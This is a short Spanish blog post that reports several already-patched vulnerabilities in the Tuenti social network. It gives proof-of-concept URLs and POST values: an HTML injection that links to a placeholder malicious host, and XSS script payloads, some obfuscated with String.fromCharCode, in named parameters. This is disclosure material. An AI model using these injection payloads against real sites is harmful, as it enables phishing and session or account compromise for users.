Multiples nuevas vulneralidades en Tuenti que han sido corregidas
Como noticia sobre la seguridad de Tuenti, descubrimos en meneame múltiples fallos de seguridad en Tuenti que han sido corregidos y han sido publicados en SecurityFocus;
INYECCIÓN HTML:
Ir a –> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos
Variable GET vulnerable –> ‘cat_id’
Nota: Aquí no fue posible un ataque XSSPRUEBA DE CONCEPTO:
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos»><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>Devuelve –> Nuevo enlace en el pie de página
CROSS SITE SCRIPTING (XSS):
Condición: Ser usuario registrado
Condición-extra: Ser amigos (víctima/atacante)Ir a –> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64
699031
Variable GET vulnerable –> ‘items’PRUEBA DE CONCEPTO:
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64
699031″><script>alert(‘y3nh4ck3r was here’)</script>Devuelve –> Mensaje de alerta
Condición: Ser usuario registrado
Condición-extra: NadaIr a –> http://www.tuenti.com/#m=videos&view=category&cat_id=upload
Variable GET vulnerable –> ‘cat_id’PRUEBA DE CONCEPTO:
http://www.tuenti.com/#m=videos&view=category&cat_id=upload»><script>ale
rt(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,
104,101,114,101,33))</script>Devuelve –> Mensaje de alerta
Condición: Nada
Condición-extra: NadaIr a –> http://www.tuenti.com/?need_invite=1
Variable POST vulnerable –> ‘email’PRUEBA DE CONCEPTO:
email=»><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,11
4,32,119,97,115,32,104,101,114,101,33))</script>Devuelve –> Mensaje de alerta
OBSERVACIÓN FINAL:
El equipo de trabajo ha fijado con éxito estas vulnerabilidades 😉
Deja una respuesta